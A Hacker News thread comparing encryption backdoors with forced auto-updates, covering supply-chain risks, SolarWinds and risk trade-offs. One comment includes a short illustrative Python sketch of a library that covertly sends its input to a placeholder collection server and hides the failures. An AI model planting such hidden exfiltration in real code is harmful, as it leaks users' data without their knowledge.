Hacker News

> The illusion that a government mandated backdoor will remain accessible just to the government is not going to last much longer than the first experiment in this direction.

I'm sympathetic to that argument, but it seems to be employed very selectively by the tech industry.

We already rely on many backdoors of exactly that kind, in the form of mandatory auto updates. Not only is this seen as perfectly fine, it's widely regarded as a security best practice.

Why can Apple or Google or Microsoft keep their signing keys secure for decades, while any keys managed by a government agency would leak with mathematical certainty?



Auto updates are a big security risk in themselves; it is only a matter of time before someone manages to hijack a major distribution point (Windows Update, Chrome, Firefox?). Once that happens, we will probably revisit this.

Also: who is to say that Apple, Google, or Microsoft do manage to keep their keys secret? Not all thieves would be stupid enough to tell, and nation-states tend to keep such advantages on ice until they have a good enough reason to use them.


> Auto updates are a big security risk in themselves; it is only a matter of time before someone manages to hijack a major distribution point (Windows Update, Chrome, Firefox?). Once that happens, we will probably revisit this.

And as even lower-hanging fruit: the package repositories of common programming languages, and things like Docker Hub.

Python's pip, Node's npm, Ruby's gems: we pull in a lot of code from people we don't even know. Every Python project installs a gazillion packages from its requirements.txt. At least OS updates come from a party we chose to do business with.

And it's not like this isn't already happening. But I think it'll take a major WannaCry-scale event before we stop doing this, because it's just so damn handy.

But if you think about it: imagine you're coding and some random 'willywonka2586' in a public Slack group says "Hey, I wrote a handy library for that; here, go install it and use it in a project for your customers!" That is essentially what we're doing.
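For what it's worth, pip's hash-checking mode at least pins exactly which artifacts get installed. A sketch of such a requirements.txt (the version pin and the digest below are placeholders for illustration, not real values):

```text
# requirements.txt, using pip's hash-checking mode:
# pip refuses to install any archive whose digest does not match.
# (version and digest are placeholders, for illustration only)
requests==2.31.0 \
    --hash=sha256:0123abcd...placeholder...
```

Installed with `pip install --require-hashes -r requirements.txt`, this fails closed if the repository ever serves a different artifact than the one you originally reviewed. It doesn't make willywonka2586 trustworthy, but it does stop the code from silently changing underneath you.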


This actually happened at a company I worked for. One of the Python dependencies of some service or another had a bit of code that phoned home. It was hard to detect, because it actually did what it advertised; it just added the phone-home part. It was only detected because routing inside AWS didn't allow it to phone home, which generated a lot of network timeouts. IIRC, it took more than 90 days before the malicious library was found and removed.
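That pattern is uncomfortably easy to write. A hypothetical sketch (the function, the endpoint, and the address are all invented; 192.0.2.1 is a reserved, unroutable documentation IP, so the call fails the way the blocked AWS egress did):

```python
import urllib.request

def slugify(text):
    """Does exactly what the package advertises."""
    result = text.lower().replace(" ", "-")
    # ...plus a quiet extra: ship the input off to a collection
    # server. Errors are swallowed, so blocked egress shows up
    # only as latency and network timeouts, never as a crash.
    try:
        urllib.request.urlopen(
            "http://192.0.2.1/collect?q=" + result, timeout=0.1)
    except OSError:
        pass
    return result

print(slugify("Hello World"))  # hello-world
```

The advertised behaviour is correct, every test passes, and the only observable symptom is exactly what the story describes: unexplained timeouts.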


> It was hard to detect, because it actually did what it advertised; it just added the phone-home part.

Was it a Microsoft dependency?


NPM should be top of the suspects list there.


Ok, but then where is the large-scale movement against auto updates? Stealing an update signing key would grant an attacker strictly more capabilities than stealing a chat-backdoor key: they could still eavesdrop on all chats by patching the apps on-device, but they could also do anything else the device's OS allows. Nevertheless, I have never read anything about the imminent risk of update compromise.


Such an attack would be discovered quickly and mitigated quickly. A mandated backdoor, by contrast, would mean waiting for the government to mitigate the problem six months later and hoping it didn't soon fall again.

At worst, the entire industry in that region is broken more often than it is functional. It's also notable that companies existing in this state of brokenness would be competing with companies living in a functional world. One might find that the defective universe continues long enough that its inhabitants go extinct.


As I understand it, hijacking the update backdoor already happened with the SolarWinds hack.


We already had that with SolarWinds, just last year.


> Not only is this seen as perfectly fine, it's widely regarded as a security best practice.

It's not "perfectly fine", but the alternative is millions of computers with known security vulnerabilities exploitable by anyone, which is far, far worse than a potential backdoor used by large companies or governments.


You could make the same argument in favour of the e2e backdoor: "The risk of child groomers, terrorists, etc. running rampant is far greater than the risk of a few chats getting leaked."

At the very least, this would need some quantification of risk: the probability and impact of keys getting leaked vs. the probability and impact of not installing a backdoor.


> At the very least, this would need some quantification of risk

Yes, of course.

And in the case of autoupdates:

1. the risk of an RCE being found on any random PC within the next few years is close to 100%

2. an unpatched RCE is strictly worse than a backdoor

3. how many computers won't be patched without forced auto updates?

In the case of e2ee, I'm afraid it's much harder to quantify, though.
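For the auto-update side, the shape of that quantification is just expected loss: probability times impact. A toy sketch, where every number is an invented placeholder purely to show the arithmetic, not an estimate:

```python
def expected_loss(p_event, impact):
    """Expected loss E = P(event) * impact, in arbitrary damage units."""
    return p_event * impact

# Invented placeholder numbers, for illustration only:
# a compromised update channel is rare but catastrophic...
update_channel_hijack = expected_loss(p_event=0.01, impact=1000)
# ...while unpatched RCEs without forced updates are near-certain
# but individually less severe.
unpatched_rce = expected_loss(p_event=0.95, impact=50)

print(update_channel_hijack, unpatched_rce)  # 10.0 47.5
```

The comparison only means something once real probabilities and impacts are plugged in, which is exactly the part that is hard to do for e2ee.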



